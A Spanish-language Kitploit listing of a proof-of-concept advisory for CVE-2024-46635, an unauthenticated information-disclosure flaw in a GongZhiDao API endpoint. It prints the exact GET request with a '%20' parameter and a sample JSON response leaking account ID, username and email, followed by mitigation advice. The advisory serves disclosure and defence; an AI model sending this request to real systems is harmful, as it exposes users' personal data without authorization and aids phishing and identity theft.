Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-46635 — Prueba de concepto para CVE-2024-46635: una vulnerabilidad de validación de entrada incorrecta en el punto final de API del sistema GongZhiDao que expone información sensible del usuario sin autenticación. | Kitploit
Herramientas/GitHubGitHub/h1thub/cve-2024-46635
Análisis de VulnerabilidadesRecopilación de InformaciónSeguridad WebPruebas de PenetraciónMala ConfiguraciónSeguridad de APIs
GitHubh1thub/cve-2024-46635

CVE-2024-46635

Prueba de concepto para CVE-2024-46635: una vulnerabilidad de validación de entrada incorrecta en el punto final de API del sistema GongZhiDao que expone información sensible del usuario sin autenticación.

Ver Repositorio
13hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-46635

Antecedentes

El sistema GongZhiDao es una plataforma desarrollada por GongZhiDao. Proporciona soluciones empresariales que incluyen gestión de usuarios, análisis de datos y funcionalidades operativas. Sin embargo, se descubrió una vulnerabilidad de seguridad en uno de los endpoints de la API que podría potencialmente llevar a la exposición de información sensible de usuarios sin la autorización adecuada.

Descripción de la Vulnerabilidad

Existe una vulnerabilidad en el endpoint de la API /oaa/api/AccountMaster/GetCurrentUserInfo del sistema GongZhiDao. Al pasar %20 (un espacio codificado en URL) en lugar del parámetro UserNameOrPhoneNumber, la API responde con información sensible del usuario, incluyendo ID de cuenta, nombre de usuario y dirección de correo electrónico, incluso sin la autenticación o autorización adecuada. Esta validación de entrada inadecuada permite a los atacantes obtener acceso no autorizado a datos sensibles.

Impacto

La explotación exitosa de esta vulnerabilidad podría llevar a la exposición de datos sensibles de usuarios, incluyendo:

  • ID de cuenta
  • Nombre de usuario
  • Dirección de correo electrónico
  • Número de teléfono (si está presente)
  • Otra información personal
  • Un atacante podría usar esta información para llevar a cabo ataques adicionales, como robo de identidad o phishing.

    Vector de Ataque

    Para explotar la vulnerabilidad, un atacante debe enviar una solicitud HTTP GET manipulada al endpoint vulnerable de la API:

    root@kitploit:~
    GET /oaa/api/AccountMaster/GetCurrentUserInfo?UserNameOrPhoneNumber=%20 HTTP/2
    

    Esta solicitud devuelve una respuesta 200 OK con datos sensibles del usuario en formato JSON:

    root@kitploit:~
    HTTP/2 200 OK
    Date: Tue, 10 Sep 2024 03:25:09 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 153
    Server: nginx/1.22.0
    X-Powered-By: ASP.NET
    Set-Cookie: Path=/; HttpOnly; Secure
    
    {"accountId":"09c05434-e1ff-4436-b1b0-01215e48b274","name":"John","phoneNumber":null,"userName":"19999999999","email1":"[email protected]"}
    

    Detalles Técnicos

    • Endpoint afectado: /oaa/api/AccountMaster/GetCurrentUserInfo
    • Método: HTTP GET
    • Parámetros: UserNameOrPhoneNumber con %20 como entrada
    • Respuesta: La API devuelve datos sensibles del usuario en formato JSON sin la validación o autorización adecuada.
    • Tipo de vulnerabilidad: Validación de entrada inadecuada / Divulgación de información sensible

    Recomendaciones de Mitigación

    1. Implementar una validación de entrada adecuada: Asegúrese de que el parámetro UserNameOrPhoneNumber se sanitice y valide correctamente. Entradas como %20 deben ser rechazadas.

    2. Verificaciones de autorización: Implemente mecanismos de autorización adecuados para garantizar que solo usuarios autenticados y autorizados puedan acceder a información sensible.

    3. Limitación de tasa y monitoreo: Aplique limitación de tasa a los endpoints de la API para prevenir ataques de fuerza bruta o automatizados, y monitoree la actividad de la API en busca de patrones de acceso anormales.

    Créditos

    Esta vulnerabilidad fue descubierta por hithub.

    Referencias

    • CWE-20: Validación de entrada inadecuada
    Descargar herramienta